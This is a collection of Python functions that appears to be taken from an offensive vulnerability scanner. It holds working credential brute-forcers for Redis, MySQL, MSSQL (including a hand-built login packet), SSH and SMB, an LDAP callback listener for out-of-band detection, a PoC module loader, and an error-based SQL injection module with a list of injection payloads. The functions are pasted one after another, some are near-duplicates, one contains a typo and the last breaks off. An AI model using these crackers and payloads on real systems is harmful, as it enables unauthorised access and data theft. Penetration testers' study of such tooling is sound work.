def query_reverse(payload, sleep=True): ''' return list : (result:bool,result_data:list) ''' if sleep: time.sleep(int(reverse_set.get("sleep", 5))) for _ in range(3): try: r = requests.get("http://{}:{}/search?query={}&key={}".format( reverse_set.get("reverse_http_ip"), reverse_set.get("reverse_http_port"), payload, reverse_set.get("secret_key")), timeout=5) res = r.json() if res.get("total") > 0: return True, res else: return False, res except Exception as ex: logger.debug( "Get result from reverse http server error:{}".format(ex) + "May be your network can't connect to {}".format( reverse_set.get("reverse_http_ip"))) continue return False, []
def ldap_response(client, address): try: client.settimeout(30) buf = client.recv(512) if buf.hex().startswith("300c0201"): send_data = b"\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00" client.send(send_data) total = 3 # 防止socket的recv接收数据不完整 buf1 = b"" while total: buf1 += client.recv(512) if len(buf1) > 16: break if buf1: path = getldappath(buf1).decode(errors="ignore") logger.debug("client:{} send path:{}".format(address, path)) res = {} res["type"] = "ldap" res["client"] = address[0] res["query"] = path res["info"] = decode(path) res["time"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) logger.info("Insert to db:" + str(res)) insert_db(res) except Exception as ex: logger.warning('Run ldap error:{} address:{}'.format(ex, address)) finally: client.close()
def run_python_plugin(): red = getredis() try: while True: try: workdata = red.lpop("plugin_data_py") if workdata: workdata_ = pickle.loads(workdata) signal.signal(signal.SIGALRM, handler_plugin) signal.alarm(int(scan_set.get("poc_timeout"))) # workdata_ will like this # { # "id": id, # "poc": poc, # } logger.debug("Python plugin get one data") p = python_plugin(workdata_) p.run() signal.alarm(0) else: time.sleep(random.uniform(1, 2)) except Exception as ex: traceback.print_exc() logger.warning("Run_python scan get error:{}".format(ex)) pass except KeyboardInterrupt as ex: logger.warning("Ctrl+C was pressed ,aborted program") except Exception as ex: traceback.print_exc() logger.warning("Run_python main scan get error:{}".format(ex))
def crack_redis(self, pwd): if self.right_pwd is None and self.is_protected is False: logger.debug("test redis_brute pwd:{}".format(pwd)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.settimeout(5) s.connect((self.addr, self.port)) if pwd is None: s.send("INFO\r\n".encode()) result = s.recv(1024) # print("pwd:{} recv:{}".format(pwd,result)) if b"redis_version" in result: self.right_pwd = str(pwd) else: s.send(("AUTH %s\r\n" % (pwd)).encode()) result = s.recv(1024) # print("pwd:{} recv:{}".format(pwd,result)) if b'+OK' in result: self.right_pwd = pwd if b"running in protected" in result: self.is_protected = Truee except Exception as ex: pass finally: s.close()
def run(self): dictdata = self.dictdata # 把请求体和响应体 base64解码,便于搜索 request_raw = base64.b64decode(self.dictdata.get("request").get("raw")).decode("utf-8", errors="ignore") response_raw = base64.b64decode(self.dictdata.get("response").get("raw")).decode("utf-8", errors="ignore") alldomains=[] for text in (request_raw,response_raw): alldomains+=self.getdomain(text) alldomains=list(set(alldomains)) actions = [] for domain in alldomains: try: action = { "_index": "burpdns", "_type": "doc", "_id":self.get16md5(domain), "_source": { "domain":domain, "topdomain":self.gettopdomain(domain), "ts":int(time.time()) } } actions.append(action) except Exception as ex: print("Process domain error:{}".format(ex)) if actions: helpers.bulk(self.es, actions) logger.debug("extractdoman insert {} lines".format(len(actions)))
def crack_mysql(self, userpwd): user, pass_ = userpwd if self.right_pwd is None and self.allow_connect: logger.debug("test mysql_brute userpwd:{}".format(userpwd)) try: pymysql.connect(self.addr, user, pass_, port=self.port) self.right_pwd = userpwd except Exception as e: if "not allowed to connect to" in str(e): self.allow_connect = False
def run(self): for plugin in cmd_line_options.open_lugins: try: c = load_file_to_module(plugin) class_plugin = c.plugin(copy.deepcopy(self.dictdata)) logger.debug("Start plugin script:{}".format(plugin)) class_plugin.run() except Exception as ex: logger.warning("run plugin script:{} error:{}".format( plugin, ex))
def verify(self): dictdata = self.dictdata # 把请求体和响应体 base64解码,便于搜索 request_raw = base64.b64decode(self.dictdata.get("request").get("raw").encode("utf8")) response_raw = base64.b64decode(self.dictdata.get("response").get("raw").encode("utf8")) dictdata["request"]["raw"] = request_raw.decode("utf-8", errors="ignore") dictdata["response"]["raw"] = response_raw.decode("utf-8", errors="ignore") dictdata["request"]["headers"] = str(dictdata["request"]["headers"]) dictdata["response"]["headers"] = str(dictdata["response"]["headers"]) if "others" in dictdata.keys(): del dictdata["others"] if "filter" in dictdata.keys(): del dictdata["filter"] dictdata["source"] = "burp" dictdata["url"]["ip"] = self.getaddr(dictdata.get("url").get("host")) dictdata["url"]["pathroot"] = "{protocol}://{host}:{port}/".format(**dictdata.get("url")) if dictdata["url"]["extension"] == "ico": body = response_raw[int(dictdata.get("response").get("bodyoffset")):] dictdata["url"]["icon_hash"] = str(mmh3.hash(base64.b64encode(body))) actions = [] action = { "_index": "httpinfo", "_id": self.http_md5(dictdata), "_source": dictdata } actions.append(action) # get url from html urls_from_html = self.get_html_url(dictdata["url"]["url"], response_raw[int(dictdata.get("response").get("bodyoffset")):].decode( "utf-8", "ignore"), dictdata["response"]["mime_inferred"]) logger.debug("urls_from_html total:{}".format(len(urls_from_html))) if urls_from_html: mythread(self.getaddr, self.hosts, 50) for url_data in urls_from_html: url_data["ip"] = self.dict_host_ip[url_data["host"]] action_ = { "_index": "httpinfo", "_id": getmd5("{ip}{pathroot}{path}".format(**url_data)), "_source": {"url": url_data, "source": "html", "ts": dictdata["ts"]} } actions.append(action_) try: helpers.bulk(others.es_conn, actions) logger.debug("es insert {} lines".format(len(actions))) except Exception as ex: logger.warning("Plugin {} get error:{}".format(__name__, ex)) traceback.print_exc()
def find_dnsservers(self): logger.debug('[+] Validate DNS servers') # for server in open('dict/dns_servers.txt').readlines(): dns_ips = [] for server in open( os.path.join(paths.MYSCAN_DATA_PATH, "common", "dns_servers.txt")).readlines(): server = server.strip() if server and not server.startswith('#'): dns_ips.append(server) mythread(self.test_server, dns_ips, 5) return self.dns_servers
def run(self): for plugin in cmd_line_options.open_lugins: try: c = load_file_to_module(plugin) class_plugin = c.plugin(copy.deepcopy(self.dictdata)) logger.debug("Start languages script:{}".format(plugin)) class_plugin.run() logger.debug("Done languages script:{}".format(plugin)) except Exception as ex: traceback.print_exc() logger.warning("run languages script:{} error:{}".format( plugin, ex))
def request(**kwargs_sour): kwargs = copy.deepcopy(kwargs_sour) red = getredis() # print("start:",kwargs) if not kwargs.get("verify", None): kwargs["verify"] = False if not kwargs.get("timeout", None): kwargs["timeout"] = 8 if not kwargs.get("headers", None): kwargs["headers"] = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0" } if cmd_line_options.proxy: kwargs["proxies"] = cmd_line_options.proxy if cmd_line_options.timeout: kwargs["timeout"] = cmd_line_options.timeout # print("end:",kwargs) if kwargs.get('data', None): if isinstance(kwargs.get("data"), str): kwargs["data"] = kwargs["data"].encode("utf-8", "ignore") r = None red.hincrby("count_all", "request", amount=1) h, p = gethostportfromurl(kwargs.get("url")) block = block_info(h, p) # retry for x in range(cmd_line_options.retry + 1): try: r = requests.request(**kwargs) block.push_result_status(0) break except requests.exceptions.ConnectTimeout: pass # logger.debug("request connect timeout :{}".format(kwargs["url"])) except requests.exceptions.ReadTimeout: pass # logger.debug("request read timeout :{}".format(kwargs["url"])) except Exception as ex: # print(kwargs) logger.debug("Request error url:{} error:{}".format( kwargs["url"], ex)) block.push_result_status(1) sleep(uniform(0, 0.2)) if r != None: if scan_set.get("search_open", False): s = searchmsg(r) s.verify() s.saveresult() else: red.hincrby("count_all", "request_fail", amount=1) return r
def run(self): dictdata = json.loads(self.red.hget(self.workdata.get("id"), "data")) # count==0 则删除,防止内存过大 current_count = self.red.hincrby(self.workdata.get("id"), "count", amount=-1) if current_count == 0: logger.debug("Will delete data for id:{}".format(self.workdata.get("id"))) self.red.delete(self.workdata.get("id")) self.workdata["dictdata"] = copy.deepcopy(dictdata) self.poc = self.workdata.get("poc") func_data = cmd_line_options.pocs_load_moudle[self.workdata.get('type')].get(hash(self.poc), None) if func_data is None: logger.debug("{} poc not found,will kill this task".format(self.poc)) return func = copy.deepcopy(func_data.get("class").POC) class_poc = func(self.workdata) logger.debug("Start python script:{} at {}".format(self.poc, self.workdata.get("data", "None"))) self.red.hincrby("count_all", "active", amount=1) try: class_poc.verify() # process = psutil.Process(os.getpid()) # os.getpid() # memInfo = process.memory_info() # print('pid: {}'.format(os.getpid()), int(memInfo.rss / 1024 / 1014), 'mb on {}'.format(os.path.basename(self.poc))) if class_poc.result: self.result = class_poc.result self.saveResult() # logger.critical(poc.result) logger.debug("Done python script:{} at {}".format(self.poc, self.workdata.get("data", "None"))) except Exception as ex: traceback.print_exc() finally: self.red.hincrby("count_all", "active", amount=-1)
def output(self, msg, insert=False): msg = "/".join( self.dictdata.get("url").get("url").split("/")[:3]) + " " + msg msgmd5 = getmd5(msg)[10:18] red = getredis() if insert == False: if not red.sismember("myscan_max_output", msgmd5): return True # 可以输出 else: logger.debug("sql boolen moudle : {} 输出个数已达{}上限,不再测试输出".format( msg, self.verify_count)) return False # 不可以继续输出 else: # red.hincrby("myscan_max_output", msgmd5, amount=1) red.sadd("myscan_max_output", msgmd5)
def crack_mssql(self, userpwd): user, pass_ = userpwd if self.right_pwd is None: logger.debug("test mssql_brute userpwd:{}".format(userpwd)) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.settimeout(8) sock.connect((self.addr, self.port)) hh = binascii.b2a_hex(self.addr.encode()).decode() husername = binascii.b2a_hex(user.encode()).decode() lusername = len(user) lpassword = len(pass_) ladd = len(self.addr) + len(str(self.port)) + 1 hpwd = binascii.b2a_hex(pass_.encode()).decode() pp = binascii.b2a_hex(str(self.port).encode()).decode() address = hh + '3a' + pp # hhost = binascii.b2a_hex(ip.encode()).decode() data = "0200020000000000123456789000000000000000000000000000000000000000000000000000ZZ5440000000000000000000000000000000000000000000000000000000000X3360000000000000000000000000000000000000000000000000000000000Y373933340000000000000000000000000000000000000000000000000000040301060a09010000000002000000000070796d7373716c000000000000000000000000000000000000000000000007123456789000000000000000000000000000000000000000000000000000ZZ3360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000Y0402000044422d4c6962726172790a00000000000d1175735f656e676c69736800000000000000000000000000000201004c000000000000000000000a000000000000000000000000000069736f5f31000000000000000000000000000000000000000000000000000501353132000000030000000000000000" data1 = data.replace(data[16:16 + len(address)], address) data2 = data1.replace(data1[78:78 + len(husername)], husername) data3 = data2.replace(data2[140:140 + len(hpwd)], hpwd) if lusername >= 16: data4 = data3.replace( '0X', str(hex(lusername)).replace('0x', '')) else: data4 = data3.replace( 'X', str(hex(lusername)).replace('0x', '')) if lpassword >= 16: data5 = data4.replace( '0Y', str(hex(lpassword)).replace('0x', '')) else: data5 = data4.replace( 'Y', str(hex(lpassword)).replace('0x', '')) hladd = hex(ladd).replace('0x', '') data6 = data5.replace('ZZ', str(hladd)) data7 = binascii.unhexlify(data6) sock.send(data7) packet = sock.recv(1024) if b'master' in packet: self.right_pwd = userpwd except Exception as e: pass finally: sock.close()
def can_output(self, msg, insert=False): ''' msg : should url+somename ''' msgmd5 = getmd5(msg) red = getredis() if insert == False: if not red.sismember("myscan_max_output", msgmd5): return True # 可以输出 else: logger.debug("{} 输出个数已达一次,不再测试输出".format(msg)) return False # 不可以继续输出 else: # red.hincrby("myscan_max_output", msgmd5, amount=1) red.sadd("myscan_max_output", msgmd5)
def crack_ssh(self, userpwd): user, pass_ = userpwd if self.right_pwd is None: logger.debug("test ssh_brute userpwd:{}".format(userpwd)) try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname=self.addr, port=self.port, username=user, password=pass_, banner_timeout=300) self.right_pwd = userpwd return "success" except Exception as e: print("fail") return str(e)
def check_url(self, path, verify=True): if not path.startswith("/"): path = "/" + path # url = self.rootpath + path url = self.url[:-1] + path req = self.parser.generaterequest({"url": url, "method": "GET"}) r = request(**req) if r is not None: if verify: if r.status_code == 200: # 根据错误页面相似度比较 if self.error_content is not None: if similar(self.error_content, r.content) > self.similar_rate: return False # args = "" if "?" in path: path, args = path.split("?", 1) args = "?" + args ext = "" if not path.endswith("/"): dirname = os.path.dirname(path) a, b = os.path.splitext(os.path.basename(path)) a = a + get_random_str(4) ext = b path_error = "".join([dirname, a, b]) + args else: path_error = path[:-1] + get_random_str(4) + path[-1] # 进行content-type比较 if ext in self.exts_bak: if "/html" in r.headers.get("Content-Type"): return False # 进行不同文件名内容相似度比较 url_ = self.url[:-1] + path_error logger.debug("test new url:{}".format(url_)) req_ = self.parser.generaterequest({"url": url_, "method": "GET"}) r_ = request(**req_) if r_ is not None and similar(r_.content, r.content) < self.similar_rate: # 再来一关,根据历史发现的文件返回包的Content-Type,Size比较 if self.similar_others(r): return (r.status_code, len(r.content)) else: return r.content return False
def run(self): # 把请求体和响应体 base64解码,便于搜索 request_raw = base64.b64decode( self.dictdata.get("request").get("raw")).decode("utf-8", errors="ignore") response_raw = base64.b64decode( self.dictdata.get("response").get("raw")).decode("utf-8", errors="ignore") alldomains = [] for text in (request_raw, response_raw): alldomains += self.getdomain(text) alldomains = list(set(alldomains)) actions = [] for domain in alldomains: if not self.existfromredis(domain): actions.append([ time.strftime("%Y-%m-%d", time.localtime()), domain, self.gettopdomain(domain) ]) self.outtofile(actions) logger.debug("extractdoman insert {} lines".format(len(actions)))
def crack_smb(self, userpwd): user, pwd = userpwd if self.right_pwd is None: logger.debug("test smb_brute userpwd:{}".format(userpwd)) conn = SMBConnection(user, pwd, "client", self.addr, use_ntlm_v2=True, is_direct_tcp=True) try: smb_authentication_successful = conn.connect(self.addr, self.addr, timeout=6) if smb_authentication_successful: self.right_pwd = userpwd conn.close() except Exception as e: pass finally: conn.close()
def run(self): dictdata = json.loads(self.red.hget(self.workdata.get("id"), "data")) # count==0 则删除,防止内存过大 current_count = self.red.hincrby(self.workdata.get("id"), "count", amount=-1) if current_count == 0: logger.debug("Will delete data for id:{}".format(self.workdata.get("id"))) self.red.delete(self.workdata.get("id")) # self.workdata["dictdata"] = copy.deepcopy(dictdata) self.poc = self.workdata.get("poc") func_data = cmd_line_options.allow_plugin[self.workdata.get('pochash')].get("class", None) if func_data is None: logger.warning("{} poc not found,will kill this task".format(self.poc)) return func = func_data.POC class_poc = func(dictdata) logger.debug("Start python plugin script:{} ".format(self.poc)) try: class_poc.verify() # process = psutil.Process(os.getpid()) # os.getpid() # memInfo = process.memory_info() # print('pid: {}'.format(os.getpid()), int(memInfo.rss / 1024 / 1014), 'mb on {}'.format(os.path.basename(self.poc))) logger.debug("Done python plugin script:{} ".format(self.poc)) except Exception as ex: traceback.print_exc()
def run_python_poc(): red = getredis() try: while True: try: if scan_set.get("random_test", False): workdata = red.spop("work_data_py_set") else: # red.lpush("work_data_py", pickledata) workdata = red.lpop("work_data_py") if workdata: workdata_ = pickle.loads(workdata) signal.signal(signal.SIGALRM, handler) signal.alarm(int(scan_set.get("poc_timeout"))) # workdata_ will like this # { # "id": id, # "data": None, perscheme 为None # "poc": poc, # "type": "perscheme" # } logger.debug("Python poc get one data, type:" + workdata_.get("type")) p = python_poc(workdata_) p.run() signal.alarm(0) else: time.sleep(random.uniform(1, 2)) except Exception as ex: traceback.print_exc() logger.warning("Run_python scan get error:{}".format(ex)) pass except KeyboardInterrupt as ex: logger.warning("Ctrl+C was pressed ,aborted program") except Exception as ex: traceback.print_exc() logger.warning("Run_python main scan get error:{}".format(ex))
def run_python(): red = getredis() try: while True: try: workdata = red.lpop("work_data_py") if workdata: workdata = pickle.loads(workdata) logger.debug("Python poc get one data, type:" + workdata.get("type")) p = python_poc(workdata) p.run() else: time.sleep(random.uniform(1, 2)) except Exception as ex: traceback.print_exc() logger.warning("Run_python process get error:{}".format(ex)) pass except KeyboardInterrupt as ex: logger.warning("Ctrl+C was pressed ,aborted program") except Exception as ex: traceback.print_exc() logger.warning("Run_python main process get error:{}".format(ex))
def check_url(self, path, verify=True): if not path.startswith("/"): path = "/" + path # url = self.rootpath + path url = self.url[:-1] + path req = self.parser.generaterequest({"url": url, "method": "GET"}) r = request(**req) if r is not None: if verify: if r.status_code == 200: # 根据错误页面相似度比较 if self.error_content is not None: if similar(self.error_content, r.content) > self.similar_rate: return False # 进行不同文件名内容相似度比较 if not path.endswith("/"): dirname = os.path.dirname(path) a, b = os.path.splitext(os.path.basename(path)) a = a + get_random_str(4) path_error = "".join([dirname, a, b]) else: path_error = path[:-1] + get_random_str(4) + path[-1] url_ = self.rootpath + path_error logger.debug("test new url:{}".format(url_)) req_ = self.parser.generaterequest({ "url": url_, "method": "GET" }) r_ = request(**req_) if r_ is not None and similar( r_.content, r.content) < self.similar_rate: return (r.status_code, len(r.content)) # 其实还可以根据 filetype库去比较 .rar .7z 等结尾的path,不过耗内存,算了 else: return r.content return False
def run(self): # for poc in self.pockeys[self.workdata.get("type")]: # func = load_file_to_module(poc) # self.poc = poc # class_poc = func.POC(copy.deepcopy(self.workdata)) # logger.debug("Start python script:{}".format(poc)) # class_poc.verify() # if class_poc.result: # self.result = copy.deepcopy(class_poc.result) # self.saveResult() # # logger.critical(poc.result) # logger.debug("Done python script:{}".format(poc)) for poc_info in cmd_line_options.pocs_load_moudle[self.workdata.get("type")]: self.poc = poc_info.get("poc") func=poc_info.get("class") class_poc = func.POC(copy.deepcopy(self.workdata)) logger.debug("Start python script:{}".format(self.poc)) class_poc.verify() if class_poc.result: self.result = copy.deepcopy(class_poc.result) self.saveResult() # logger.critical(poc.result) logger.debug("Done python script:{}".format(self.poc))
def test_server(self, server): resolver = dns.resolver.Resolver(configure=False) resolver.lifetime = resolver.timeout = 5.0 try: resolver.nameservers = [server] answers = resolver.query( 'public-dns-a.baidu.com') # an existed domain if answers[0].address != '180.76.76.76': raise Exception('Incorrect DNS response') try: resolver.query( 'test.bad.dns.lijiejie.com') # non-existed domain logger.debug('[+] Bad DNS Server found %s' % server) except Exception as e: self.dns_servers.append(server) logger.debug('[+] Server %s < OK > Found %s' % (server.ljust(16), len(self.dns_servers))) except Exception as e: logger.debug('[+] Server %s <Fail> Found %s' % (server.ljust(16), len(self.dns_servers)))
def init_options(): cmd_line_options.update(cmd_line_parser().__dict__) # 判断banner if cmd_line_options.show_version: print(banner()) sys.exit() print(banner()) #判断check-reveres if cmd_line_options.check_reverse: check_reverse() sys.exit() # 此处需要改进,添加判读,容错,和sock代理等 if cmd_line_options.proxy: host_port = cmd_line_options.proxy cmd_line_options.proxy = { "http": "http://" + host_port, "https": "https://" + host_port, } else: cmd_line_options.proxy = {} if cmd_line_options.verbose == 0: logger.logger.setLevel(logging.DEBUG) elif cmd_line_options.verbose == 1: logger.logger.setLevel(logging.INFO) elif cmd_line_options.verbose == 2: logger.logger.setLevel(logging.WARNING) elif cmd_line_options.verbose == 3: logger.logger.setLevel(logging.CRITICAL) # 处理html-output if cmd_line_options.command == "webscan": logger.info("Vuln results will output to: {}".format( cmd_line_options.html_output)) # if os.path.exists(cmd_line_options.html_output): # logger.warning( # "file {} already exists, please backup and remove it at first".format(cmd_line_options.html_output)) # sys.exit() # else: # try: # with open(cmd_line_options.html_output, "w") as f: # f.write(gethtmlheader()) # except Exception as ex: # logger.warning("Create file {} get error:{}".format(cmd_line_options.html_output, ex)) # sys.exit() cmd_line_options.allow_poc = [] cmd_line_options.pocs_perfile = [] cmd_line_options.pocs_perfoler = [] cmd_line_options.pocs_perscheme = [] cmd_line_options.pocs_load_moudle = { "perfile": [], "perfolder": [], "perscheme": [] } print(cmd_line_options.disable) if "all" not in cmd_line_options.disable: poc_keys = { "perfile": cmd_line_options.pocs_perfile, "perfolder": cmd_line_options.pocs_perfoler, "perscheme": cmd_line_options.pocs_perscheme } if cmd_line_options.disable: cmd_line_options.enable = None for _dir in ["perfile", "perfolder", "perscheme"]: path_dir = os.path.join(paths.MYSCAN_POCS_PATH, _dir) exists_poc_with_ext = list( filter(lambda x: not x.startswith("__"), os.listdir(path_dir))) temp = copy.deepcopy(exists_poc_with_ext) for disable in cmd_line_options.disable: for poc in exists_poc_with_ext: if disable in poc and poc in temp: temp.remove(poc) for x in temp: poc_keys.get(_dir).append(os.path.join(path_dir, x)) if cmd_line_options.enable: for _dir in ["perfile", "perfolder", "perscheme"]: path_dir = os.path.join(paths.MYSCAN_POCS_PATH, _dir) exists_poc_with_ext = list( filter( lambda x: (not x.startswith("__") and (x.endswith(".py") or x.endswith(".yaml"))), os.listdir(path_dir))) if "*" == cmd_line_options.enable: for poc in exists_poc_with_ext: poc_keys.get(_dir).append( os.path.join(path_dir, poc)) else: for disable in cmd_line_options.enable: for poc in exists_poc_with_ext: if disable in poc: poc_keys.get(_dir).append( os.path.join(path_dir, poc)) for _dir in ["perfile", "perfolder", "perscheme"]: logger.debug("{} total: {} pocs".format( _dir.capitalize(), len(poc_keys.get(_dir)))) for poc in poc_keys.get(_dir): logger.info("Load Pocs:{}".format(poc)) cmd_line_options.pocs_load_moudle[_dir].append({ "poc": poc, "class": load_file_to_module(poc) }) if not (cmd_line_options.pocs_perfile or cmd_line_options.pocs_perfoler or cmd_line_options.pocs_perscheme): logger.warning( "No Pocs ,please use --enable * or like --enable un_auth sqli" ) sys.exit() # plugin 插件参数处理 cmd_line_options.open_lugins = [] plugins_dir = paths.MYSCAN_PLUGINS_PATH exists_poc_with_ext = list( filter(lambda x: not x.startswith("__"), os.listdir(plugins_dir))) if cmd_line_options.plugins: for openplugin in list(set(cmd_line_options.plugins)): for plugin in exists_poc_with_ext: if openplugin in plugin: logger.info("Load Plugin:{}".format( os.path.join(plugins_dir, plugin))) cmd_line_options.open_lugins.append( os.path.join(plugins_dir, plugin))
def init_options(): # 打补丁 pathch_urlencode() cmd_line_options.update(cmd_line_parser().__dict__) # 判断banner if cmd_line_options.show_version: print(banner()) sys.exit() print(banner()) # 判断check-reveres if cmd_line_options.check_reverse: check_reverse() sys.exit() if cmd_line_options.command == "reverse": return # 此处需要改进,添加判读,容错,和sock代理等 if cmd_line_options.proxy: host_port = cmd_line_options.proxy cmd_line_options.proxy = {"http": "http://{}".format(host_port), "https": "https://{}".format(host_port), } else: cmd_line_options.proxy = {} if cmd_line_options.verbose == 0: logger.logger.setLevel(logging.DEBUG) elif cmd_line_options.verbose == 1: logger.logger.setLevel(logging.INFO) elif cmd_line_options.verbose == 2: logger.logger.setLevel(logging.WARNING) elif cmd_line_options.verbose == 3: logger.logger.setLevel(logging.CRITICAL) # 验证DNS_Servers,添加到全局变量 if db_set.get("es_open"): servers = find_dns_server().find_dnsservers() logger.info("Found dns_servers:{}".format(servers)) if servers == []: logger.warning("Not Found dns_servers, Check your Networks or edit data/common/dns_servers.txt") sys.exit() others.dns_servers = servers # 处理html-output logger.info("Vuln results will output to: {}".format(cmd_line_options.html_output)) cmd_line_options.allow_poc = [] cmd_line_options.allow_plugin = {} cmd_line_options.pocs_perfile = [] cmd_line_options.pocs_perfoler = [] cmd_line_options.pocs_perscheme = [] cmd_line_options.pocs_perserver = [] cmd_line_options.pocs_load_moudle = { "perfile": {}, "perfolder": {}, "perscheme": {}, "perserver": {} } poc_keys = { "perfile": cmd_line_options.pocs_perfile, "perfolder": cmd_line_options.pocs_perfoler, "perscheme": cmd_line_options.pocs_perscheme, "perserver": cmd_line_options.pocs_perserver } if cmd_line_options.command == "webscan": cmd_line_options.poc_folders = ["perfile", "perfolder", "perscheme"] if cmd_line_options.command == "hostscan": cmd_line_options.poc_folders = ["perserver"] if "all" not in cmd_line_options.disable: if cmd_line_options.disable: cmd_line_options.enable = None for _dir in cmd_line_options.poc_folders: # old way # path_dir = os.path.join(paths.MYSCAN_POCS_PATH, _dir) # exists_poc_with_ext = list( # filter(lambda x: not x.startswith("__"), os.listdir(path_dir))) # temp = copy.deepcopy(exists_poc_with_ext) # for disable in cmd_line_options.disable: # for poc in exists_poc_with_ext: # if disable in poc and poc in temp: # temp.remove(poc) # for x in temp: # poc_keys.get(_dir).append(os.path.join(path_dir, x)) # new way to get subdir for root, dirs, files in os.walk(os.path.join(paths.MYSCAN_POCS_PATH, _dir)): for file in files: if file.endswith(".py") and not file.startswith("__"): if not any([disable in file for disable in cmd_line_options.disable]): poc_keys.get(_dir).append(os.path.abspath(os.path.join(root, file))) else: for _dir in cmd_line_options.poc_folders: # path_dir = os.path.join(paths.MYSCAN_POCS_PATH, _dir) # exists_poc_with_ext = list( # filter(lambda x: (not x.startswith("__") and x.endswith(".py")), # os.listdir(path_dir))) # if "*" == cmd_line_options.enable: # for poc in exists_poc_with_ext: # poc_keys.get(_dir).append(os.path.join(path_dir, poc)) # else: # for disable in cmd_line_options.enable: # for poc in exists_poc_with_ext: # if disable in poc: # poc_keys.get(_dir).append(os.path.join(path_dir, poc)) for root, dirs, files in os.walk(os.path.join(paths.MYSCAN_POCS_PATH, _dir)): for file in files: if file.endswith(".py") and not file.startswith("__"): if not cmd_line_options.enable: poc_keys.get(_dir).append(os.path.abspath(os.path.join(root, file))) else: if any([enable in file for enable in cmd_line_options.enable]): poc_keys.get(_dir).append(os.path.abspath(os.path.join(root, file))) # # for enable in cmd_line_options.enable: # if enable in file: # poc_keys.get(_dir).append(os.path.abspath(os.path.join(root, file))) for _dir in cmd_line_options.poc_folders: logger.debug("{} total: {} pocs".format(_dir.capitalize(), len(list(set(poc_keys.get(_dir)))))) for poc in list(set(poc_keys.get(_dir))): logger.info("Load Pocs:{}".format(poc)) cmd_line_options.pocs_load_moudle[_dir][hash(poc)] = { "poc": poc, "class": load_file_to_module(poc) } if cmd_line_options.command == "webscan": if not (cmd_line_options.pocs_perfile or cmd_line_options.pocs_perfoler or cmd_line_options.pocs_perscheme): logger.warning("No Pocs ,please use --enable un_auth sqli") sys.exit() if cmd_line_options.command == "hostscan": if not cmd_line_options.pocs_perserver: logger.warning("No Pocs ,please use --enable brute ms17010") sys.exit() else: logger.warning("No Pocs Load!") # languages 插件参数处理 plugins_dir = os.path.join(paths.MYSCAN_PLUGINS_PATH, cmd_line_options.command) exists_poc_with_ext = list( filter(lambda x: not x.startswith("__"), os.listdir(plugins_dir))) if cmd_line_options.plugins: for openplugin in list(set(cmd_line_options.plugins)): for plugin in exists_poc_with_ext: if openplugin in plugin: plugin_path = os.path.join(plugins_dir, plugin) logger.info("Load Plugin:{}".format(plugin_path)) cmd_line_options.allow_plugin[hash(plugin_path)] = { "poc": plugin_path, "class": load_file_to_module(plugin_path) } if len(cmd_line_options.allow_plugin) == 0: logger.warning("No Plugins Load!") total_poc = 0 for x in cmd_line_options.pocs_load_moudle.values(): total_poc += len(x) others.total_pocs=total_poc if total_poc == 0 and len(cmd_line_options.allow_plugin) == 0: logger.warning("No Plugins Pocs Load! Check your arguments ,Program will exit") sys.exit() # 处理ssti全局变量 importssti() # 需要注册一下需要urlpath的插件 poc1 = os.path.join(paths.MYSCAN_POCS_PATH, "perfolder", "info", "myscan_dirscan.py") if poc1 in cmd_line_options.pocs_perfoler: get_dict() # 打补丁 # patch_banner_timeout() #好像没用 ipv6_patch() # 配置连接 set_es_conn() # 配置dishost host if cmd_line_options.host: cmd_line_options.dishost = []
def verify(self): if self.dictdata.get("url").get("extension").lower() in notAcceptedExt: return # 搜索返回包: self.parser = dictdata_parser(self.dictdata) # 黑名单 # tomcat if self.dictdata.get("url").get("path").startswith( "/examples/") or self.dictdata.get("url").get( "path").startswith("/docs/"): return # body url参数注入 random_num = get_random_num(8) random_num_md5 = getmd5(random_num) payloads = [ ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format( random_num), random_num_md5, "a"), ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format( random_num), random_num_md5, "a"), ("'and(select'1'from/**/cast(md5({})as/**/int))>'0".format( random_num), random_num_md5, "a"), ('"and(select\'1\'from/**/cast(md5({})as/**/int))>"0'.format( random_num), random_num_md5, "a"), ("'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))>'0" .format(random_num), random_num_md5, "a"), ('"and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'{}\')))>"0' .format(random_num), random_num_md5, "a"), ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format( random_num), random_num_md5, "a"), ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format( random_num), random_num_md5, "a"), ("/**/and/**/cast(md5('{}')as/**/int)>0".format(random_num), random_num_md5, "a"), ("convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))". format(random_num), random_num_md5, "w"), ("extractvalue(1,concat(char(126),md5({})))".format(random_num), random_num_md5, "w") ] params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") reqs = [] if params: for param in params: for payload, search_str, method in [('鎈\'"\(', None, "a") ] + payloads: req = self.parser.getreqfromparam(param, method, payload) reqs.append( (req, payload, search_str, random_num_md5, param)) mythread(self.args_inject, reqs, cmd_line_options.threads) # header注入 if not plugin_set.get("sqli").get("header_inject"): return header_msg = { "User-Agent": { "msg": "sqli_error_ua", "default": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36" }, "Referer": { "msg": "sqli_error_referer", "default": "https://www.qq.com/search" }, "X-Forwarded-For": { "msg": "sqli_error_xff", "default": "12.40.9.144" }, "Real-Ip": { "msg": "sqli_error_ri", "default": "2.40.9.144" }, "X-Forwarded-Host": { "msg": "sqli_error_xfh", "default": "2.40.9.144" 